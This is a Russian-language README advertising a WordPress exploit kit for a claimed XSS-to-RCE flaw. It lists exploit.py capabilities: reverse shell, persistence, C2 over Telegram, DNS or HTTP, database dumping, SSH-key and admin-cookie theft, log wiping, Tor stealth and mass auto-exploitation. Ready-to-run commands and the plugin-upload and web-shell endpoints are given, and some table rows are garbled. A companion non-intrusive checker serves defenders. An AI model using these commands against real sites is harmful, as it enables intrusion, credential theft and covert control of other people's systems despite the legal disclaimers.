
🛡️ CVE-2026-64638 — Набор для оценки безопасности WordPress (CVSS 8.9) | Инструментарий для пентеста WordPress 4.7.0-7.0.2. Включает оценку уязвимостей и модули расширенного анализа. 🐍 Безопасная проверка и эксплуатация, 2 режима. Расширенный набор для Blue&Red Team Best 2026-64638, только для авторизованного использования. Оставайтесь в рамках закона <3zd

⚠️ ТОЛЬКО ДЛЯ ЭТИЧНОГО ИСПОЛЬЗОВАНИЯ – АВТОРИЗОВАННОЕ ТЕСТИРОВАНИЕ БЕЗОПАСНОСТИ
Данный репозиторий предоставляет инструменты только для авторизованных специалистов по безопасности, blue team и пентестеров.
Несанкционированный доступ к компьютерным системам незаконен согласно CFAA (США), Computer Misuse Act (Великобритания), TCK 243/244 (Турция) и аналогичным законам по всему миру.
CVE‑2026‑64638 — это критическая отражаемая XSS-уязвимость до аутентификации в ядре WordPress версий с 4.7.0 по 7.0.2, которая позволяет атакующему расширить XSS-атаку до полного удалённого выполнения кода (RCE) через функцию Application Password.
strip_tags() и WordPress-функция wp_kses_post() по-разному разбирают HTML-теги, что позволяет вредоносному вводу пройти санитизацию.wp-login.php). При неудачном входе полезная нагрузка отражается обратно и выполняется в браузере жертвы.| Инструмент | Назначение | Целевой пользователь |
|---|---|---|
exploit.py | Полный набор средств эксплуатации с reverse shell, закреплением, C2, повышением привилегий, форензикой памяти, дампом базы данных, извлечением SSH-ключей и массовым сканированием. |
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]
exploit.pysafecheck.py| Эндпоинт | Назначение |
|---|---|
/wp-login.php | Страница входа – точка внедрения XSS |
/wp-admin/authorize-application.php |
Данное программное обеспечение предоставляется только в образовательных целях и для авторизованного тестирования безопасности.
| Red team / авторизованные пентестеры |
safecheck.py | Неинтрузивный проверщик уязвимостей, который обнаруживает отражение XSS и оценивает уровень безопасности без выполнения вредоносных полезных нагрузок. Формирует подробные отчёты. | Blue team / аудиторы безопасности |
| Возможность | exploit.py | safecheck.py |
|---|
| Обнаружение уязвимости | ✅ | ✅ |
| Определение версии WordPress | ✅ | ✅ |
| Обнаружение отражения XSS | ✅ | ✅ |
| Перехват Application Password | ✅ | ❌ |
| Загрузка плагина (RCE) | ✅ | ❌ |
| Reverse shell | ✅ | ❌ |
| C2-связь (HTTP/DNS/Telegram) | ✅ | ❌ |
| Повышение привилегий | ✅ | ❌ |
| Форензика памяти | ✅ | ❌ |
| Дамп базы данных | ✅ | ❌ |
| Извлечение SSH-ключей | ✅ | ❌ |
| Методы закрепления | ✅ | ❌ |
| Аудит заголовков безопасности | ❌ | ✅ |
| Проверка раскрытия конфигурационных файлов | ❌ | ✅ |
| Проверка листинга каталогов | ❌ | ✅ |
| Проверка раскрытия phpinfo | ❌ | ✅ |
| Массовое сканирование | ✅ | ✅ |
| Поддержка прокси | ✅ | ✅ |
| Поддержка Tor | ✅ | ✅ |
| Ngrok-туннелирование | ✅ | ❌ |
| Интерактивная оболочка | ✅ | ❌ |
| Неинтрузивный (безопасный) режим | ❌ | ✅ |
| Вывод JSON / отчётов | ✅ | ✅ |
| Сценарий | Рекомендуемый инструмент |
|---|
| Blue Team – проверка, уязвима ли ваша установка WordPress | safecheck.py |
| Аудит безопасности – неинтрузивная оценка уязвимостей | safecheck.py |
| Red Team – авторизованное пентестирование с полной эксплуатацией | exploit.py |
| Bug Bounty – тестирование с ответственным раскрытием | safecheck.py |
| Массовое сканирование – проверка нескольких целей на уязвимость | exploit.py или safecheck.py |
| Реагирование на инциденты – проверка, скомпрометированы ли системы | safecheck.py |
| Продвинутое пост-эксплуатационное взаимодействие – закрепление, C2, форензика | exploit.py |
| Параметр | Описание |
|---|
-t, --target | URL целевого WordPress (например, https://wordpress-site.com) |
-l, --list | Файл со списком целей (по одной в строке) для массового сканирования |
--lhost | Локальный IP-адрес для обратных вызовов reverse shell |
--lport | Локальный порт для reverse shell (по умолчанию: 4444) |
--proxy | HTTP/HTTPS-прокси (например, http://127.0.0.1:8080) |
--timeout | Тайм-аут запроса в секундах (по умолчанию: 10) |
--retry | Количество повторов (по умолчанию: 3) |
--threads | Количество потоков для массового сканирования (по умолчанию: 5) |
--exploit | Автоматическая эксплуатация уязвимых целей при массовом сканировании |
--ngrok-token | Ngrok authtoken для внешнего туннелирования |
--payload-type | Тип XSS-полезной нагрузки: reflected, dom_based, waf_bypass, case_manipulation, double_encoded |
--session-hijack | Включить перехват сессии (кража cookie администратора) |
--dump-db | Сделать дамп базы данных WordPress (требуется pymysql) |
--extract-ssh | Извлечь SSH-ключи из целевой системы |
--tor | Маршрутизировать трафик через Tor (socks5h://127.0.0.1:9050) |
--stealth | Включить скрытый режим (подделка заголовков, задержка запросов) |
--no-cleanup | Пропустить очистку журналов после эксплуатации |
--ssl-verify | Проверять SSL-сертификаты |
--c2-type | Тип C2: http, dns, telegram |
--c2-server | URL C2-сервера или токен Telegram-бота |
--auto-priv-esc | Автоматическое повышение привилегий после получения оболочки |
--memory-forensics | Включить модуль форензики памяти |
-v, --verbose | Подробный вывод |
-q, --quiet | Тихий режим (минимальный вывод) |
| Параметр | Описание |
|---|
-t, --target | URL целевого WordPress (например, https://wordpress-site.com) |
-l, --list | Файл со списком целей (по одной в строке) для массового сканирования |
--timeout | Тайм-аут запроса в секундах (по умолчанию: 10) |
--retry | Количество повторов (по умолчанию: 3) |
--threads | Количество потоков для массового сканирования (по умолчанию: 5) |
--proxy | HTTP/HTTPS-прокси (например, http://127.0.0.1:8080) |
--tor | Маршрутизировать трафик через Tor (socks5h://127.0.0.1:9050) |
--ssl-verify | Проверять SSL-сертификаты |
--output | Выходной JSON-файл отчёта |
-v, --verbose | Подробный вывод |
-q, --quiet | Тихий режим (минимальный вывод) |
| # | Сценарий | Команда |
|---|
| 1 | Быстрая проверка уязвимости | python safecheck.py -t https://wordpress-site.com |
| 2 | Детальное сканирование с отчётом | python safecheck.py -t https://wordpress-site.com --output report.json -v |
| 3 | Полная эксплуатация с reverse shell | python exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit |
| 4 | Использование собственной XSS-полезной нагрузки | python exploit.py -t https://wordpress-site.com --payload-type waf_bypass |
| 5 | Перехват сессии (кража cookie администратора) | python exploit.py -t https://wordpress-site.com --session-hijack |
| 6 | Дамп базы данных WordPress | python exploit.py -t https://wordpress-site.com --dump-db |
| 7 | Извлечение SSH-ключей | python exploit.py -t https://wordpress-site.com --extract-ssh |
| 8 | Использование Tor для анонимности | python exploit.py -t https://wordpress-site.com --tor --stealth |
| 9 | C2-связь через Telegram | python exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id" |
| 10 | Массовое сканирование из файла | python exploit.py -l targets.txt --threads 10 --exploit |
| 11 | Форензика памяти после получения оболочки | python exploit.py -t https://wordpress-site.com --memory-forensics |
| 12 | Автоматическое повышение привилегий | python exploit.py -t https://wordpress-site.com --auto-priv-esc |
| 13 | Интерактивная оболочка | python exploit.py -t https://wordpress-site.com -i |
| 14 | Ngrok-туннелирование | python exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN |
| Команда | Описание |
|---|
reverse | Запустить прослушиватель reverse shell |
persist | Применить методы закрепления (cron, systemd, rc.local, SSH, WP) |
clean | Очистить системные журналы и историю |
dumpdb | Сделать дамп базы данных WordPress |
ssh | Извлечь SSH-ключи |
priv | Автоматическое повышение привилегий |
mem | Запустить форензику памяти |
c2 | Показать статус C2 |
c2task | Проверить наличие задач C2 |
exit | Выйти из интерактивной оболочки |
| Генерация Application Password |
/wp-admin/update.php?action=upload-plugin | Загрузка плагина (RCE) |
/wp-content/plugins/{slug}/{slug}.php | Выполнение веб-шелла |
| Страна | Соответствующий закон |
|---|
| США | Computer Fraud and Abuse Act (CFAA) – 18 U.S.C. § 1030 |
| Великобритания | Computer Misuse Act 1990 |
| Турция | TCK 243 (несанкционированный доступ), TCK 244 (вмешательство в систему) |
| Германия | StGB § 202a (шпионаж за данными), § 202b (перехват данных) |
| Франция | Loi Godfrain – статья 323-1 |
| Австралия | Cybercrime Act 2001 |
| Канада | Criminal Code – раздел 342.1 |
| Индия | Information Technology Act 2000 – разделы 43, 66 |
| Япония | Act on Prohibition of Unauthorized Computer Access |